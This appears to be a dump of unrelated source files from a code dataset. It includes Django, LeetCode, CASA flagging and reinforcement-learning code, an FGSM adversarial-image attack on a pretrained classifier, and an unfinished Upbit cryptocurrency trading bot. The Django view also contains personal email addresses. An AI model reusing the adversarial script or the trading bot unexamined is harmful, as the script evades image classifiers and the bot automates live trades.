Зайдите в панель администратора, чтобы узнать больше.'\n + 'Электронная почта клиента: ' + email + '. Контактный телефон: ' + phone,\n 'krupin_anton@mail.ru',\n [realtor_email, 'krupin_anton@mail.ru', 'krupinanton87@gmail.com'],\n fail_silently=False\n )\n\n messages.success(request, 'Ваш запрос был отправлен. Риэлтор скоро свяжется с вами')\n\n return redirect('/listings/'+listing_id)\n\n else:\n listing_id = request.POST['listing_id']\n messages.error(request, 'Зарегистрирутесь или авторизуйтесь, чтобы оставить запрос.')\n return redirect('/listings/'+listing_id)\n","sub_path":"contacts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"54645140","text":"from functools import lru_cache\r\n\r\n# 吃掉一个橘子。\r\n# 如果剩余橘子数 n 能被 2 整除,那么你可以吃掉 n/2 个橘子。\r\n# 如果剩余橘子数 n 能被 3 整除,那么你可以吃掉 2*(n/3) 个橘子。\r\n\r\n\r\nclass Solution:\r\n def minDays(self, n: int) -> int:\r\n @lru_cache(None)\r\n def dfs(n: int) -> int:\r\n if n <= 1:\r\n return n\r\n return 1 + min(dfs(n // 2) + n % 2, dfs(n // 3) + n % 3)\r\n\r\n return dfs(n)\r\n\r\n # 简单bfs,即使是2e9最多也只用搜30多次\r\n def minDays2(self, n: int) -> int:\r\n res = 0\r\n queue = [n]\r\n visited = set()\r\n while queue: # bfs\r\n nextQueue = []\r\n for x in queue:\r\n if x == 0:\r\n return res\r\n visited.add(x)\r\n if x - 1 not in visited:\r\n nextQueue.append(x - 1)\r\n if x % 2 == 0 and x // 2 not in visited:\r\n nextQueue.append(x // 2)\r\n if x % 3 == 0 and x // 3 not in visited:\r\n nextQueue.append(x // 3)\r\n res += 1\r\n queue = nextQueue\r\n\r\n\r\nprint(Solution().minDays(10))\r\n# 输出:4\r\n# 解释:你总共有 10 个橘子。\r\n# 第 1 天:吃 1 个橘子,剩余橘子数 10 - 1 = 9。\r\n# 第 2 天:吃 6 个橘子,剩余橘子数 9 - 2*(9/3) = 9 - 6 = 3。(9 可以被 3 整除)\r\n# 第 3 天:吃 2 个橘子,剩余橘子数 3 - 2*(3/3) = 3 - 2 = 1。\r\n# 第 4 天:吃掉最后 1 个橘子,剩余橘子数 1 - 1 = 0。\r\n# 你需要至少 4 天吃掉 10 个橘子。\r\n","sub_path":"22_专题/最少操作次数/1553. 吃掉 N 个橘子的最少天数-倒着记忆化dfs.py","file_name":"1553. 吃掉 N 个橘子的最少天数-倒着记忆化dfs.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"514510855","text":"import pigpio\r\nimport time\r\nimport threading\r\nimport numpy as np\r\nimport copy\r\n\r\nclass Mount(threading.Thread):\r\n def __init__(self, pin_h, pin_v):\r\n super(Mount, self).__init__()\r\n \r\n self.max_angle = {\r\n \"h\": { \"high\": 90, \"low\": -90 },\r\n \"v\": { \"high\": 0, \"low\": -80 }\r\n }\r\n self.step = { \"h\": 3, \"v\": 1 }\r\n self.add_move = { \"h\": 0, \"v\": 0 }\r\n self.interval = 10\r\n \r\n self.angle_home = { \"h\": -13, \"v\": -42 }\r\n self.angle = copy.deepcopy(self.angle_home)\r\n self.angle_new = copy.deepcopy(self.angle_home)\r\n self.pin = { \"h\": pin_h, \"v\": pin_v }\r\n self.io = pigpio.pi()\r\n time.sleep(0.3)\r\n\r\n def __del__(self):\r\n self.io.stop()\r\n\r\n def run(self):\r\n while True:\r\n self._update_angles()\r\n self._move()\r\n time.sleep(self.interval/1000.0)\r\n\r\n def set_new_angle(self, direction, new_angle):\r\n self.angle_new[direction] = np.clip(new_angle, self.max_angle[direction][\"low\"], self.max_angle[direction][\"high\"])\r\n\r\n def move_start(self, direction):\r\n speed = 1.0\r\n if (direction == \"up\"):\r\n self.add_move[\"v\"] = self.step[\"v\"] * speed\r\n elif (direction == \"down\"):\r\n self.add_move[\"v\"] = self.step[\"v\"] * speed * -1\r\n elif (direction == \"left\"):\r\n self.add_move[\"h\"] = self.step[\"h\"] * speed\r\n elif (direction == \"right\"):\r\n self.add_move[\"h\"] = self.step[\"h\"] * speed * -1\r\n\r\n def move_stop(self, direction):\r\n if (direction in (\"up\", \"down\")):\r\n self.add_move[\"v\"] = 0\r\n elif (direction in (\"left\", \"right\")):\r\n self.add_move[\"h\"] = 0\r\n elif (direction == \"center\"):\r\n self.angle_new = copy.deepcopy(self.angle_home)\r\n\r\n def _move(self):\r\n for direction, pin in self.pin.items():\r\n self.io.set_servo_pulsewidth(pin, self._get_pulse_width(self.angle[direction]))\r\n\r\n def _get_pulse_width(self, angle):\r\n pw = 500 + ( float(2000)/180 * (angle + 90) )\r\n return int( np.clip(pw, 500, 2500) )\r\n\r\n def _update_angles(self):\r\n for d in (\"h\", \"v\"):\r\n self.angle_new[d] += self.add_move[d]\r\n self.angle_new[d] = np.clip(self.angle_new[d], self.max_angle[d][\"low\"], self.max_angle[d][\"high\"])\r\n if (self.angle[d] != self.angle_new[d]):\r\n diff = self.angle_new[d] - self.angle[d]\r\n sign = 1 if diff >= 0 else -1\r\n self.angle[d] += self.step[d] * sign if abs(diff) > self.step[d] else diff\r\n","sub_path":"server/camera_mount.py","file_name":"camera_mount.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"301086798","text":"\"\"\"\n Veti primi un numar intreg de la tastatura.\n Va trebui sa printati suma numerelor pana la numarul respectiv.\n\n exemplu:\n Veti primi: 5\n Veti printa: 15\n\"\"\"\nn = int(input())\n\nsum = (n*(n+1))//2\n\nprint(sum)\n","sub_path":"session2/ex28.py","file_name":"ex28.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"472863657","text":"# ian.heywood@physics.ox.ac.uk\n\n\nimport pickle\nimport numpy\n\n\nproject_info = pickle.load(open('project_info.p','rb'))\n\n\nmyms = project_info['master_ms']\n\n\nclearstat()\nclearstat()\n\n\n# ------------------------------------------------------------------------\n# Frequency ranges to flag over all baselines\n\nbadfreqs = ['850~900MHz', # Lower band edge\n\t'1658~1800MHz', # Upper bandpass edge\n\t'1419.8~1421.3MHz'] # Galactic HI\n\nmyspw = ''\nfor badfreq in badfreqs:\n\tmyspw += '*:'+badfreq+','\nmyspw = myspw.rstrip(',')\n\nflagdata(vis = myms, \n\tmode = 'manual', \n\tspw = myspw)\n\n\n# ------------------------------------------------------------------------\n# Frequency ranges to flag over a subset of baselines\n# From the MeerKAT Cookbook\n# https://github.com/ska-sa/MeerKAT-Cookbook/blob/master/casa/L-band%20RFI%20frequency%20flagging.ipynb\n\nbadfreqs = ['900MHz~915MHz', # GSM and aviation\n\t'925MHz~960MHz',\t\t\t\t\n\t'1080MHz~1095MHz',\n\t'1565MHz~1585MHz', # GPS\n\t'1217MHz~1237MHz',\n\t'1375MHz~1387MHz',\n\t'1166MHz~1186MHz',\n\t'1592MHz~1610MHz', # GLONASS\n\t'1242MHz~1249MHz',\n\t'1191MHz~1217MHz', # Galileo\n\t'1260MHz~1300MHz',\n\t'1453MHz~1490MHz', # Afristar\n\t'1616MHz~1626MHZ', # Iridium\n\t'1526MHz~1554MHz', # Inmarsat\n\t'1600MHz'] # Alkantpan\n\nmyspw = ''\nfor badfreq in badfreqs:\n\tmyspw += '*:'+badfreq+','\nmyspw = myspw.rstrip(',')\n\nflagdata(vis = myms,\n\tmode = 'manual',\n\tspw = myspw,\n\tuvrange = '<600')\n\n\n# ------------------------------------------------------------------------\n# Clipping, quacking, zeros, autos\n# Note that clip will always flag NaN/Inf values even with a range \n\nflagdata(vis = myms,\n\tmode = 'quack',\n\tquackinterval = 8.0,\n\tquackmode = 'beg')\n\nflagdata(vis = myms,\n\tmode = 'manual',\n\tautocorr = True)\n\nflagdata(vis = myms,\n\tmode = 'clip',\n\tclipzeros = True)\n\nflagdata(vis = myms,\n\tmode = 'clip',\n\tclipminmax = [0.0,100.0])\n\n# ------------------------------------------------------------------------\n# Save the flags\n\nflagmanager(vis = myms,\n\tmode = 'save',\n\tversionname = 'basic')\n\n\nclearstat()\nclearstat()\n","sub_path":"oxkat/1GC_02_casa_basic_flags.py","file_name":"1GC_02_casa_basic_flags.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"284760504","text":"from lxml import etree\nfrom rest_framework import renderers\nfrom StringIO import StringIO\nfrom django.utils.xmlutils import SimplerXMLGenerator\nfrom django.utils.encoding import smart_text\nimport six\nimport datetime\n\n\n\nclass ScoringRiskXMLRenderer(renderers.BaseRenderer):\n\n def render(self, data, risk, accepted_media_type=None, renderer_context=None):\n \"\"\"\n Renders *obj* into serialized XML.\n \"\"\"\n if data is None or risk is None:\n return ''\n\n #scoring_results = etree.fromstring(scoring_results)\n\n stream = StringIO()\n\n xml = SimplerXMLGenerator(stream, self.charset)\n xml.startDocument()\n xml.startElement(\"Risk\", {'state': '%s' % risk.state,\n 'schemaVersion': '2.0',\n 'id': '%s' % risk.id,\n 'ownerUser': '%s' % risk.ownerUser,\n 'version': '%s' % risk.version, })\n\n #render the dataitems\n for dataitem in data:\n self._to_xml(xml, dict(dataitem.items()))\n\n\n xml.startElement(\"History\", {})\n xml.addQuickElement('Event', attrs={'type': 'created',\n 'user': '%s' % risk.ownerUser,\n 'timestamp': '%s' % datetime.datetime.utcnow(),\n 'serverNote': 'Created the new entity',\n 'userNote': '', })\n xml.endElement(\"History\")\n\n xml.endElement(\"Risk\")\n xml.endDocument()\n return stream.getvalue()\n\n def _to_xml(self, xml, data):\n if isinstance(data, dict):\n xml.addQuickElement('DataItem', attrs={'name': '%s' % data.get('name'),\n 'value': '%s' % data.get('value')})\n\n elif data is None:\n # Don't output any value\n pass\n\n else:\n xml.characters(smart_text(data))","sub_path":"dss/apps/engine/drivetrains/Risk_Renderer.py","file_name":"Risk_Renderer.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"211886125","text":"from pprint import pprint\nfrom random import uniform\nfrom random import random\nfrom random import shuffle\n\nfrom sklearn.feature_extraction import DictVectorizer\n# from sklearn.linear_model import SGDRegressor\nfrom sklearn.linear_model import LinearRegression\nfrom concept_formation.preprocessor import Flattener\nfrom concept_formation.preprocessor import Tuplizer\nfrom concept_formation.cobweb3 import Cobweb3Tree\n\nfrom planners.fo_planner import FoPlanner\nfrom planners.fo_planner import subst\nfrom planners.rulesets import functionsets\nfrom planners.rulesets import featuresets\n# from planners.fo_planner import arith_rules\nfrom agents.BaseAgent import BaseAgent\n\n# rules = arith_rules\nepsilon = .9\nsearch_depth = 2\n\n\ndef weighted_choice(choices):\n choices = [(w, c) for w, c in choices]\n shuffle(choices)\n total = sum(w for w, _ in choices)\n r = uniform(0, total)\n upto = 0\n for w, c in choices:\n if upto + w >= r:\n return c\n upto += w\n assert False, \"Shouldn't get here\"\n\n\ndef max_choice(choices):\n choices = [(w, random(), c) for w, c in choices]\n choices.sort(reverse=True)\n return choices[0][2]\n\n\ndef get_action_key(action):\n operator, mapping, effects = action\n return (operator.name, frozenset(mapping.items()))\n\n\nclass Stub:\n def __init__(self, v):\n self.v = v\n\n def predict(self, k):\n return self.v\n\n\nclass LinearFunc:\n\n def __init__(self):\n self.clf = LinearRegression()\n self.dv = DictVectorizer()\n self.X = []\n self.y = []\n\n def ifit(self, state):\n y = state['_q']\n del state['_q']\n self.X.append(state)\n self.y.append(y)\n self.clf.fit(self.dv.fit_transform(self.X), self.y)\n\n def categorize(self, state):\n X = self.dv.transform([state])\n resp = Stub(self.clf.predict(X)[0])\n return resp\n\n\nclass Tabular:\n\n def __init__(self, q_init=0, learning_rate=0.1):\n self.Q = {}\n self.q_init = q_init\n self.alpha = learning_rate\n\n def ifit(self, state):\n y = state['_q']\n del state['_q']\n\n x = frozenset(state.items())\n if x not in self.Q:\n self.Q[x] = self.q_init\n\n self.Q[x] = ((1 - self.alpha) * self.Q[x] + self.alpha * y)\n\n def categorize(self, state):\n x = frozenset(state.items())\n if x not in self.Q:\n self.Q[x] = self.q_init\n return Stub(self.Q[x])\n\n\nclass QLearner:\n\n def __init__(self, q_init=0, discount=1, func=None):\n self.func = func\n if self.func is None:\n self.func = Cobweb3Tree\n\n self.Q = {}\n self.q_init = q_init\n self.g = discount\n\n def __len__(self):\n return sum([self.Q[a].root.num_concepts() for a in self.Q])\n\n def get_features(self, state):\n return {str(a): state[a] for a in state}\n\n def evaluate(self, state, action):\n if state is None:\n return 0\n if action not in self.Q:\n return self.q_init\n state = self.get_features(state)\n return self.Q[action].categorize(state).predict(\"_q\")\n\n def update(self, state, action, reward, next_state, next_actions):\n q_max = 0\n if len(next_actions) > 0 and next_state is not None:\n q_max = max([self.evaluate(next_state, get_action_key(a))\n for a in next_actions])\n y = reward + self.g * q_max\n print(\"Updating with\", y)\n\n if action not in self.Q:\n self.Q[action] = self.func()\n\n state = self.get_features(state)\n state['_q'] = y\n self.Q[action].ifit(state)\n\n\nclass RLAgent(BaseAgent):\n\n def __init__(self, action_set):\n self.Q = QLearner(func=Cobweb3Tree)\n self.last_state = None\n self.last_action = None\n self.reward = None\n self.max_episodes = 5\n self.action_set = action_set.name\n\n def request(self, state):\n tup = Tuplizer()\n flt = Flattener()\n state = flt.transform(tup.transform(state))\n\n new = {}\n for attr in state:\n if (isinstance(attr, tuple) and attr[0] == 'value'):\n new[('editable', attr[1])] = state[attr] == ''\n for attr2 in state:\n if (isinstance(attr2, tuple) and attr2[0] == 'value'):\n if (attr2 == attr or attr < attr2 or (state[attr] == \"\"\n or state[attr2]\n == \"\")):\n continue\n if (state[attr] == state[attr2]):\n new[('eq', attr, attr2)] = True\n state.update(new)\n # pprint(state)\n\n # for episode in range(self.max_episodes):\n while True:\n\n print(\"#########\")\n print(\"NEW TRACE\")\n print(\"#########\")\n kb = FoPlanner([(self.ground(a),\n state[a].replace('?', 'QM') if\n isinstance(state[a], str) else\n state[a])\n for a in state], functionsets[self.action_set])\n\n curr_state = {x[0]: x[1] for x in kb.facts}\n next_actions = [a for a in kb.fc_get_actions(epsilon=epsilon)]\n trace_actions = []\n depth = 0\n\n while depth < search_depth:\n actions = [(self.Q.evaluate(curr_state, get_action_key(a)), a)\n for a in next_actions]\n\n print(\"NEXT ACTION WEIGHTS\")\n print(sorted([(w, a[0].name[0]) for w, a in actions],\n reverse=True))\n\n # operator, mapping, effects = weighted_choice(actions)\n operator, mapping, effects = max_choice(actions)\n # operator, mapping, effects = choice(action_space)\n\n self.last_state = curr_state\n self.last_action = get_action_key((operator, mapping, effects))\n trace_actions.append(subst(mapping, operator.name))\n\n for f in effects:\n kb.add_fact(f)\n\n # if not termainal, then decrease reward\n # self.reward = -1\n self.reward = 0\n curr_state = {x[0]: x[1] for x in kb.facts}\n depth += 1\n\n # check if we're in a terminal state\n # if so, query oracle\n for f in effects:\n f = self.unground(f)\n if f[0] == 'sai':\n response = {}\n response['label'] = str(trace_actions)\n response['selection'] = f[1]\n response['action'] = f[2]\n response['inputs'] = {'value': f[3]}\n # {a: rg_exp[3+i] for i, a in\n # enumerate(input_args)}\n # response['inputs'] = list(rg_exp[3:])\n response['foas'] = []\n # pprint(response)\n print(\"EXECUTING ACTION\", self.last_action)\n print(\"Requesting oracle feedback\")\n\n return response\n\n # punish for failed search\n if depth >= search_depth:\n # self.reward -= 3 * search_depth\n curr_state = None\n next_actions = []\n else:\n # because we're not terminal we can compute next_actions\n next_actions = [a for a in\n kb.fc_get_actions(epsilon=epsilon,\n must_match=effects)]\n\n self.Q.update(self.last_state, self.last_action, self.reward,\n curr_state, next_actions)\n\n # return {}\n\n def train(self, state, label, foas, selection, action, inputs, correct):\n # tup = Tuplizer()\n # flt = Flattener()\n # state = flt.transform(tup.transform(state))\n # pprint(state)\n if ((self.last_state is None or self.last_action is None or\n self.reward is None)):\n return\n\n print(\"CORRECTNESS\", correct)\n\n # add reward based on feedback.\n if correct:\n self.reward += 1 # * search_depth\n # else:\n # self.reward -= 1 # 2 * search_depth\n\n # terminal state, no next_actions\n next_actions = []\n\n print(\"LAST ACTION\", self.last_action, self.reward)\n self.Q.update(self.last_state, self.last_action, self.reward, None,\n next_actions)\n\n # print('searching for:', correct)\n # for i in range(30):\n # kb = FoPlanner([(self.ground(a),\n # state[a].replace('?', 'QM') if\n # isinstance(state[a], str) else\n # state[a])\n # for a in state], functionsets[self.action_set])\n\n # cum_reward = 0\n # trace = [{str(a): v for a, v in kb.facts}]\n # rewards = [0]\n # while True:\n # action_space = [a for a in\n # kb.fc_get_actions(epsilon=epsilon)]\n\n # actions = []\n # for some_action in action_space:\n # new_state = {}\n # for f in kb.facts.union(some_action[2]):\n # if isinstance(f, tuple) and len(f) == 2:\n # new_state[str(f[0])] = f[1]\n # else:\n # new_state[str(f)]: True\n # utility = 0\n # if self.fit:\n # utility =\n # self.UtilityFun.predict(self.dv.transform([new_state]))[0]\n # actions.append((some_action, exp(utility)))\n\n # operator, mapping, effects = weighted_choice(actions)\n\n # # operator, mapping, effects = choice(action_space)\n\n # for f in effects:\n # kb.add_fact(f)\n\n # new_state = {}\n # for f in kb.facts.union(action[2]):\n # if isinstance(f, tuple) and len(f) == 2:\n # new_state[str(f[0])] = f[1]\n # else:\n # new_state[str(f)]: True\n # trace.append(new_state)\n\n # reward = 0\n\n # done = False\n # for f in effects:\n # if f[0] == 'sai':\n # done = True\n # gen_sai = f[:4]\n # goal = ('sai', selection, action, '-1' if 'value' not\n # in inputs else inputs['value'])\n # # print(gen_sai, 'vs', goal)\n # if gen_sai == goal:\n # if correct:\n # reward += 2 * search_depth\n # else:\n # reward -= 2 * search_depth\n # else:\n # if correct:\n # reward -= 2 * search_depth\n # # else:\n # # reward += search_depth * 2\n\n # rewards.append(reward)\n # cum_reward += reward\n\n # if done or cum_reward < -1 * search_depth:\n # break\n\n # self.X += trace\n # self.y += [sum(rewards[i:]) for i in range(len(rewards))]\n # print(\"reward obtained from sample %i: %i\" % (i, cum_reward))\n\n # self.UtilityFun.fit(self.dv.fit_transform(self.X), self.y)\n # self.fit = True\n\n def ground(self, arg):\n if isinstance(arg, tuple):\n return tuple(self.ground(e) for e in arg)\n elif isinstance(arg, str):\n return arg.replace('?', 'QM')\n else:\n return arg\n\n def unground(self, arg):\n if isinstance(arg, tuple):\n return tuple(self.unground(e) for e in arg)\n elif isinstance(arg, str):\n return arg.replace('QM', '?')\n else:\n return arg\n","sub_path":"agents/RLAgent.py","file_name":"RLAgent.py","file_ext":"py","file_size_in_byte":12381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"105672440","text":"import os\nimport pandas as pd\nfrom PIL import Image\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nimport torchvision.datasets as datasets\nfrom torch.utils.data import Dataset, DataLoader\nimport torchvision.models as models\nimport torchvision.transforms as transforms\nimport matplotlib.pyplot as plt\nimport sys\n\n\ndevice = torch.device(\"cuda\")\ndef prob(output):\n x = []\n y = []\n probs = F.softmax(output,dim=1)\n max_p,index = torch.max(probs,dim=1)\n x.append(index.item())\n y.append(max_p.item())\n probs[0][index.item()] = 0\n max_p,index = torch.max(probs,dim=1)\n x.append(index.item())\n y.append(max_p.item())\n probs[0][index.item()] = 0\n max_p,index = torch.max(probs,dim=1)\n x.append(index.item())\n y.append(max_p.item())\n \n return x,y\n# 實作一個繼承 torch.utils.data.Dataset 的 Class 來讀取圖片\nclass Adverdataset(Dataset):\n def __init__(self, root, label, transforms):\n # 圖片所在的資料夾\n self.root = root\n # 由 main function 傳入的 label\n self.label = torch.from_numpy(label).long()\n # 由 Attacker 傳入的 transforms 將輸入的圖片轉換成符合預訓練模型的形式\n self.transforms = transforms\n # 圖片檔案名稱的 list\n self.fnames = []\n\n for i in range(200):\n self.fnames.append(\"{:03d}\".format(i))\n\n def __getitem__(self, idx):\n # 利用路徑讀取圖片\n img = Image.open(os.path.join(self.root, self.fnames[idx] + '.png'))\n # 將輸入的圖片轉換成符合預訓練模型的形式\n img = self.transforms(img)\n # 圖片相對應的 label\n label = self.label[idx]\n return img, label\n \n def __len__(self):\n # 由於已知這次的資料總共有 200 張圖片 所以回傳 200\n return 200\nx1 = []\nx2 = []\ny1 = []\ny2 = []\n\nclass Attacker:\n def __init__(self, img_dir, label):\n # 讀入預訓練模型 vgg16\n self.model = models.densenet121(pretrained = True)\n self.model.cuda()\n self.model.eval()\n self.mean = [0.485, 0.456, 0.406]\n self.std = [0.229, 0.224, 0.225]\n # 把圖片 normalize 到 0~1 之間 mean 0 variance 1\n self.normalize = transforms.Normalize(self.mean, self.std, inplace=False)\n transform = transforms.Compose([ \n transforms.Resize((224, 224), interpolation=3),\n transforms.ToTensor(),\n self.normalize\n ])\n # 利用 Adverdataset 這個 class 讀取資料\n input_prefix = sys.argv[1]\n self.dataset = Adverdataset(os.path.join( input_prefix,'images'), label, transform)\n \n self.loader = torch.utils.data.DataLoader(\n self.dataset,\n batch_size = 1,\n shuffle = False)\n\n # FGSM 攻擊\n def fgsm_attack(self, image, epsilon, data_grad):\n # 找出 gradient 的方向\n sign_data_grad = data_grad.sign()\n # 將圖片加上 gradient 方向乘上 epsilon 的 noise\n perturbed_image = image + epsilon * sign_data_grad\n return perturbed_image\n \n def attack(self, epsilon): \n # 存下一些成功攻擊後的圖片 以便之後顯示\n cnt=-1\n adv_examples = []\n wrong, fail, success = 0, 0, 0\n for (data, target) in self.loader:\n cnt+=1\n output_prefix = sys.argv[2]\n data, target = data.to(device), target.to(device)\n data_raw = data\n data.requires_grad = True\n # 將圖片丟入 model 進行測試 得出相對應的 class\n output = self.model(data)\n init_pred = output.max(1, keepdim=True)[1]\n \n if (cnt == 0 or cnt == 4 or cnt == 16):\n x,y = prob(output)\n x1.append(x)\n y1.append(y)\n # 如果 class 錯誤 就不進行攻擊\n if init_pred.item() != target.item():\n\n adv_ex = data_raw * torch.tensor(self.std, device = device).view(3, 1, 1) + torch.tensor(self.mean, device = device).view(3, 1, 1)\n adv_ex = adv_ex.squeeze().detach().cpu().numpy() \n adv_ex = np.transpose(adv_ex, (1, 2, 0))\n np.clip(adv_ex,0,1,out=adv_ex)\n\n plt.imsave(os.path.join(output_prefix, '%03d'%cnt +'.png'),adv_ex)\n\n wrong += 1\n continue\n \n # 如果 class 正確 就開始計算 gradient 進行 FGSM 攻擊\n loss = F.nll_loss(output, target)\n self.model.zero_grad()\n loss.backward()\n data_grad = data.grad.data\n perturbed_data = self.fgsm_attack(data, epsilon, data_grad)\n\n # 再將加入 noise 的圖片丟入 model 進行測試 得出相對應的 class \n output = self.model(perturbed_data) \n final_pred = output.max(1, keepdim=True)[1]\n\n if (cnt == 0 or cnt == 4 or cnt == 16):\n x,y = prob(output)\n x2.append(x)\n y2.append(y)\n\n adv_ex = perturbed_data * torch.tensor(self.std, device = device).view(3, 1, 1) + torch.tensor(self.mean, device = device).view(3, 1, 1)\n adv_ex = adv_ex.squeeze().detach().cpu().numpy() \n adv_ex = np.transpose(adv_ex, (1, 2, 0))\n np.clip(adv_ex,0,1,out=adv_ex)\n\n plt.imsave(os.path.join(output_prefix, '%03d'%cnt +'.png'),adv_ex)\n if final_pred.item() == target.item():\n # 辨識結果還是正確 攻擊失敗\n fail += 1\n else:\n # 辨識結果失敗 攻擊成功\n success += 1\n # 將攻擊成功的圖片存入\n if len(adv_examples) < 5:\n adv_ex = perturbed_data * torch.tensor(self.std, device = device).view(3, 1, 1) + torch.tensor(self.mean, device = device).view(3, 1, 1)\n adv_ex = adv_ex.squeeze().detach().cpu().numpy() \n data_raw = data_raw * torch.tensor(self.std, device = device).view(3, 1, 1) + torch.tensor(self.mean, device = device).view(3, 1, 1)\n data_raw = data_raw.squeeze().detach().cpu().numpy()\n\n adv_examples.append( (init_pred.item(), final_pred.item(), data_raw , adv_ex) ) \n\n final_acc = (fail / (wrong + success + fail))\n \n print(\"Epsilon: {}\\tTest Accuracy = {} / {} = {}\\n\".format(epsilon, fail, len(self.loader), final_acc))\n return adv_examples, final_acc\n\n\nif __name__ == '__main__':\n # 讀入圖片相對應的 label\n input_prefix = sys.argv[1]\n\n df = pd.read_csv(os.path.join( input_prefix,\"labels.csv\"))\n df = df.loc[:, 'TrueLabel'].to_numpy()\n label_name = pd.read_csv(os.path.join( input_prefix,\"categories.csv\"))\n label_name = label_name.loc[:, 'CategoryName'].to_numpy()\n # new 一個 Attacker class\n attacker = Attacker(os.path.join( input_prefix,'images'), df)\n # 要嘗試的 epsilon\n epsilons = [0.1]\n\n accuracies, examples = [], []\n # 進行攻擊 並存起正確率和攻擊成功的圖片\n for eps in epsilons:\n ex, acc = attacker.attack(eps)\n accuracies.append(acc)\n examples.append(ex)\nimport matplotlib.pyplot as plt\nindex = [0,1,2]\nname = ['1.png','2.png','3.png','4.png','5.png','6.png']\nfor i in range(len(x1)):\n plt.cla()\n plt.ylabel(\"Probability\")\n plt.xlabel(\"class\")\n plt.title(\"Origin picture\")\n plt.xticks(index,x1[i])\n plt.bar(index,y1[i])\n plt.savefig(name[i*2])\n\n plt.cla()\n plt.ylabel(\"Probability\")\n plt.xlabel(\"class\")\n plt.title(\"Adversarial picture\")\n plt.xticks(index,x2[i])\n plt.bar(index,y2[i])\n plt.savefig(name[i*2+1],color='red')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n","sub_path":"attack.py","file_name":"attack.py","file_ext":"py","file_size_in_byte":7912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"225043702","text":"import time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport mglearn\nimport joblib\nimport datetime\nimport pyupbit\nimport csv\n# access = \n# secret = # 본인 값으로 변경\nupbit = pyupbit.Upbit(access, secret)\n\n\ndef get_balance(ticker):\n \"\"\"잔고 조회\"\"\"\n balances = upbit.get_balances()\n for b in balances:\n if b['currency'] == ticker:\n if b['balance'] is not None:\n return float(b['balance']), b[\"avg_buy_price\"]\n else:\n return 0\n\n\n\n\n# model = joblib.load(open('rnd_depth_3.pkl','rb'))\n# model = joblib.load(open('rnd_depth_3.pkl','rb'))\n# model = joblib.load(open('rnd_depth_3.pkl','rb'))\nmodel = joblib.load(open('gbrt_3.pkl','rb'))\nf = open(f\"./trash.csv\",'a', newline='')\nw = csv.writer(f)\n\n\ncoin = \"KRW-ETC\"\n\nbalance =0\nwallet = 0\nbuy_price=0\ncount = 180\ntimecount = 0\ncnt = True\nsum_price = 0\n#매도 가격\nask_price = 0\n#매수 가격\nbid_price = 0\n\navailable_quantity=0\ncurrent_price =0\n\n#time 시간동안 거래되지 않은 거래를 취소\ndef cancel_order(order, time, current_price): #order 는 bid or ask\n global w\n response = upbit.get_order(coin)\n print(response)\n for r in response:\n if r[\"side\"] == order:\n if r['state'] == 'wait':\n if r[\"price\"] != current_price:\n create_time = r['created_at'][:10] + \" \" + r['created_at'][11:19]\n dt = datetime.datetime.strptime(create_time, '%Y-%m-%d %H:%M:%S')\n now = datetime.datetime.now().timestamp()\n dt = dt.timestamp()\n print(\"주문 후 경과 시간\", now - dt)\n if now - dt >= time:\n print(\"주문 취소!!\")\n w.writerow([\"주문 취소\", dt, now,now -dt, time, r['side'], r['price']])\n print(upbit.cancel_order(r['uuid']))\n\ndef bid(current_price, bid_price) :\n global balance, wallet, cnt,buy_price\n if current_price == bid_price:\n available_quantity = balance / (current_price * 1.0005)\n wallet += available_quantity\n balance -= available_quantity * 1.0005 * current_price\n cnt = False\n buy_price = current_price * 1.0005\n print(\"매수 성공!\", \"구매가: \", buy_price, \"구매 갯수: \", wallet, \"잔고 :\", balance+wallet*current_price )\n\ndef ask(current_price, ask_price):\n global balance, wallet, cnt,buy_price\n if current_price == ask_price:\n print(\"매도 성공!\", \"구매가: \", buy_price, wallet, \"잔고 :\", balance+0.9995*current_price, \"이득: \", balance + wallet*buy_price)\n balance += wallet * 0.9995 * current_price\n cnt = True\n wallet =0\n\nresponse = []\nsum_prices = []\nwait_uuid = 0\n#for current_price, orders in zip(y,X):\nwhile True:\n timecount += 1\n\n orderbook = pyupbit.get_orderbook(tickers=coin)\n current_price = pyupbit.get_current_price(coin)\n\n if timecount <= count:\n sum_prices.append(current_price)\n try:\n sum_price += current_price\n except:\n count+=1\n\n continue\n else :\n sum_price -= sum_prices[0]\n sum_prices.pop(0)\n sum_price += current_price\n sum_prices.append(current_price)\n #평균 가격을 구함\n avg = sum_price/count\n\n\n orders = []\n orders.append(orderbook[0][\"total_ask_size\"])\n orders.append(orderbook[0][\"total_bid_size\"])\n orderbook_units = orderbook[0][\"orderbook_units\"]\n # print(orderbook_units)\n for unit in orderbook_units:\n orders.append(unit[\"ask_price\"])\n orders.append(unit[\"bid_price\"])\n orders.append(unit[\"ask_size\"])\n orders.append(unit[\"bid_size\"])\n\n orders = np.array([orders])\n predict_price = model.predict(orders)\n\n balance = upbit.get_balance(\"KRW\")\n\n #수수료를 포함해도, 이득을 취할 수 있는 가격일 때 매수\n if round(current_price*1.0005) < round(avg):\n print(current_price, \"평균가:\",round(avg), predict_price)\n if balance >= round(current_price*1.0005):\n\n if cnt:\n cancel_order(\"bid\", 1000, current_price)\n if balance > 5000:\n\n if get_balance(coin):\n _, buy_price = get_balance(coin)\n\n\n\n if predict_price[0] <= current_price:\n available_quantity = int(balance / (predict_price[0] * 